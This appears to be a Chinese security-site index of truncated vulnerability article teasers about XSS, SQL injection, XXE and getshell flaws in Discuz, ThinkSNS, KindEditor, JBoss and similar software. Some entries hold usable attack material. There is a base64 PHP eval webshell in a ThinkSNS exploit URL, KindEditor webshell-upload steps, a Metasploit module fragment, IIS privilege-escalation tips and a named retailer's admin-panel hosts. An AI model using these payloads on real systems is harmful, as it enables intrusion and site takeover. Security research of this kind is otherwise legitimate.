discuz X25 某功能存在 xss漏洞 html 脚本未过滤 - 网关注热度:16

discuz X25 广播回复存在xss漏洞html、脚本未过滤修复方案：过滤下就ok了作者 造梦师..[详情]

ecshop数据库默认账户信息，导致网站信息泄漏关注热度:14

ecshop在默认安装的时候，安装程序会添加两个管理员账户，虽然管理员账户没有操作权限，但是通过这两个账户还是可以看到网站的订单数据.这是admin_user表的截图。随便找个ecshop的网站..[详情]

java filter防止sql注入攻击 - 网站安全 - 自学php关注热度:20

原理，过滤所有请求中含有非法的字符，例如：, select delete 等关键字，黑客可以利用这些字符进行注入攻击，原理是后台实现使用拼接字符串，案例：某个网站的登入验证的SQL查询代码..[详情]

对 zend framework xxe injection 的分析 - 网站安全 - 自关注热度:10

前几天网上爆出一个zend framework 漏洞 作者：mkods具体描述如下: https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt ; 根据描述，该漏洞是发生在zend 框架 xmlrpc模块的.....[详情]

iis6 提权提示 Can not find wmiprvse.exe 的突破方法 -关注热度:13

方法一：在IIS环境下，如果权限做得不严格，我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的。进程查看里面直接K掉在结束之后，它会再次运行，这时候的PID值的不一样的。这时候..[详情]

新版百度空间存储型XSS - 网站安全 - 自学php关注热度:11

新版的百度空间有一处没有过滤导致XSS，但是可以被利用的字段，长度限制为了20个长度，去掉两端的构造字符，只有16个长度了。还是老办法，eval(X), eval(name)的方法在利用上比较间接，..[详情]

库巴购物管理后台gethell - 网站安全 - 自学php关注热度:14

很容易就找到它的集成管理后台:http://webadmin.coo8.comhttp://manage.coo8.comhttp://buy.coo8.comhttp://dns2.coo8.com搞不懂为啥要这么多管理后台,连个验证码都没,也没限制登陆错误次数扫目录轻而易举找..[详情]

TEXTCUBE鸡肋读取文件漏洞 - 网站安全 - 自学php关注热度:16

韩国的一个博客程序TEXTCUBE 读了下发现个奇怪的问题 技术有限 希望大家点拨下!\framework\Dispatcher.php (57行)$part = strtok($uri[#39;input#39;], #39;/#39;); // $uri[#39;input#39;] == .....[详情]

利用JBoss漏洞拿webshell方法 - 网站安全 - 自学ph关注热度:13

JBoss是一个大型应用平台，普通用户很难接触到。越是难以接触到的东西越觉得高深，借用北京公交司机李素丽的一句话用力只能干出称职，用心才能干出优秀，在安全上也是如此，虽然..[详情]

Umbraco CMS远程命令执行缺陷 - 网站安全 - 自学ph关注热度:19

require #39;msf/core#39;class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize super( .....[详情]

KindEditor编辑器上传修改拿shell漏洞 - 网站安全关注热度:42

作者：relywind影响版本：KindEditor 3.5.2~4.1漏洞利用：打开编辑器，将一句话改名为1.jpg 上传图片，打开文件管理，进入down目录，跳至尾页，最后一个图片既是我们上传的一句话点击改名打..[详情]

Thinksns 2.5 getshell漏洞 - 网站安全 - 自学php关注热度:41

EXP:thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW2NdKXtldmFsKCRfUE9TVFtjXSk7fWVsc2V7cGhwaW5mbygpO30/Pg==w=t=.phpr=1shell地址：http://www.2cto.com /data/thumb/44/ed/44ed1732a7e55.....[详情]

互动百科多处存储型XSS - 网站安全 - 自学php关注热度:11

个人资料里，设置简介随便写如js代码，且对长度没有限制危害巨大。详细说明：其他用户如果访问该用户资料（只需要搜索该用户昵称即可），则会形成xss攻击。此外在系统通知处，若..[详情]

手机土豆网储存型XSS - 网站安全 - 自学php关注热度:17

文章评论处存在储存型XSShttp://m.tudou.com/view.do?code=146219443v=2修复方案：过滤参数作者：zhk..[详情]

创建安全PHP应用程序的实用建议 - 网站安全 - 自关注热度:14

大家都知道PHP已经是当前最流行的Web应用编程语言了。但是也与其他脚本语言一样，PHP也有几个很危险的安全漏洞。所以在这篇教学文章中，我们将大致看看几个实用的技巧来让你避免..[详情]